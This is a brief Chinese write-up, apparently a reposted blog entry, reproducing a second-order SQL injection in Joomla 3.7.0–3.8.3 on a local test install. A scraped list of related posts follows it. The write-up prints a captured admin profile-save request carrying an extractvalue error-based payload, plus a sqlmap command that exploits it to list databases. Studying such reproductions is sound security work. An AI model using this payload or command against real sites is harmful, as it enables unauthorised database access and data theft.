【研究】Joomla二阶注入
受影响Joomla版本:3.7.0 到 3.8.3
1、下载安装Joomla3.8.3,登录后台管理系统:http://127.0.0.1/joomla/administrator/index.php
2、访问编辑个人信息界面:
http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769
点击保存按钮,抓取数据包为(红色代码为测试payload):
POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 Content-Type: multipart/form-data; boundary=---------------------------132821454821567 Content-Length: 1875 Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5 Connection: keep-alive Upgrade-Insecure-Requests: 1-----------------------------132821454821567 Content-Disposition: form-data; name="jform[name]"savan -----------------------------132821454821567 Content-Disposition: form-data; name="jform[username]"savan -----------------------------132821454821567 Content-Disposition: form-data; name="jform[password2]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[password]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[email]"2@qq.com -----------------------------132821454821567 Content-Disposition: form-data; name="jform[registerDate]"2018-02-28 09:13:57 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[lastvisitDate]"2018-03-01 06:29:04 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[id]"771 -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][admin_style][0]"extractvalue(1,concat(0x7e,(select version()) *)) -----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][admin_language]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][language]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][editor]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][helpsite]"-----------------------------132821454821567 Content-Disposition: form-data; name="jform[params][timezone]"-----------------------------132821454821567 Content-Disposition: form-data; name="task"profile.apply -----------------------------132821454821567 Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583"1 -----------------------------132821454821567--
3、sqlmap对上述数据包进行测试
sqlmap.py -r C:\Users\18721\Desktop\1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch
转载于:https://www.cnblogs.com/peterpan0707007/p/8489368.html
【研究】Joomla二阶注入相关推荐
- Spring内核研究-通过工厂注入
Spring专门设计了对工厂模式支持,你可以使用静态工厂方法来创建一个Bean,也可以使用实例工厂的方法来创建Bean.下面分别介绍这2种方法. 静态工厂注入 定义一个Bean使用自己类上的静 ...
- SQL注入-二阶注入(十)
实验目的 普及二阶注入的原理及发生的场景,了解二阶注入与普通注入的区别,熟悉二阶注入的方法和过程. 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件: ...
- SQL注入之——宽字节与二阶注入
宽字节与二阶注入 宽字节注入 当我们把 php.ini 文件里面的 magic_quotes_gqc 参数设为 ON 时所有的'(单引号), "(双引号),\(反斜杠)和 null 字符都会 ...
- 依赖注入的三种方式_ASP.NET Core技术研究-探秘依赖注入框架
ASP.NET Core在底层内置了一个依赖注入框架,通过依赖注入的方式注册服务.提供服务.依赖注入不仅服务于ASP.NET Core自身,同时也是应用程序的服务提供者. 毫不夸张的说,ASP.NET ...
- ASP.NET Core技术研究-探秘依赖注入框架
ASP.NET Core在底层内置了一个依赖注入框架,通过依赖注入的方式注册服务.提供服务.依赖注入不仅服务于ASP.NET Core自身,同时也是应用程序的服务提供者. 毫不夸张的说,ASP.NET ...
- 字节码插桩(javassist)之插入代码块|IOC框架(Hilt)之对象注入~研究
Hilt对象注入 | javassist插桩 研究 Hilt对象注入 javassist字节码插桩 创建buildSrc的module 重写Transform 熟悉TransformInvocatio ...
- php sql注入 替换,通过替换单引号来防止SQL注入
我想知道这样的事情有什么问题(PHP) 这个想法. 很久以前就证明它存在缺陷. 首先,这段代码确实改变了数据.这是抽象思考的好方法,但它会在现实生活中使你的应用程序崩溃.事实上,这是不可接受的行为.但 ...
- 应力循环次数60ant_循环超临界CO2对煤的孔隙结构和力学特性的影响研究
点击蓝字关注我们 Hello,大家好,我是小编Sunshine.好久不见,甚是想念?.本期小编为大家分享一篇重庆大学苏二磊等学者最新发表在<Journal of CO2 Utilization& ...
- SQL注入是什么?如何防止?
SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种 ...
最新文章
- phpstrom安装bootstrap3插件
- nand ubi -2 ubi管理下的SLC nand
- iframe带了token不显示_token是什么
- MatLab 2014a编译jar包时mcc无法使用的问题
- 控件时出现“未能实例化控件******,VS2008 中无法使用ACTIVEX控件的解决
- 记事本编写Java代码
- 2022谷粒商城学习笔记(二十五)支付宝沙箱模拟支付
- Unity3d第一人称视角如何设置
- 以首尾交换的方法交换字符串中以'A'开头和以'N'结尾的单词
- 《免费》——比特经济的到来
- 电动汽车基于Origin的数据分析
- 基于pytorch的双模态数据载入
- Maestro Z实时无标记细胞分析仪,评估免疫细胞治疗效价
- 第四次计算革命孕育“数字经济体”
- 使用IBM InfoSphere Guardium REST API
- 山东省计算机等级考试初级试题,2013山东省计算机等级考试试题 二级ACCESS理论考试试题及答案...
- tvOS多层图片的使用
- Jenkins使用6--jenkins git timeout
- 恢复受损Word文档的9种方法--旧时光 oldtimeblog
- 【老脸教你做游戏】小鸟飞过障碍物的游戏(上)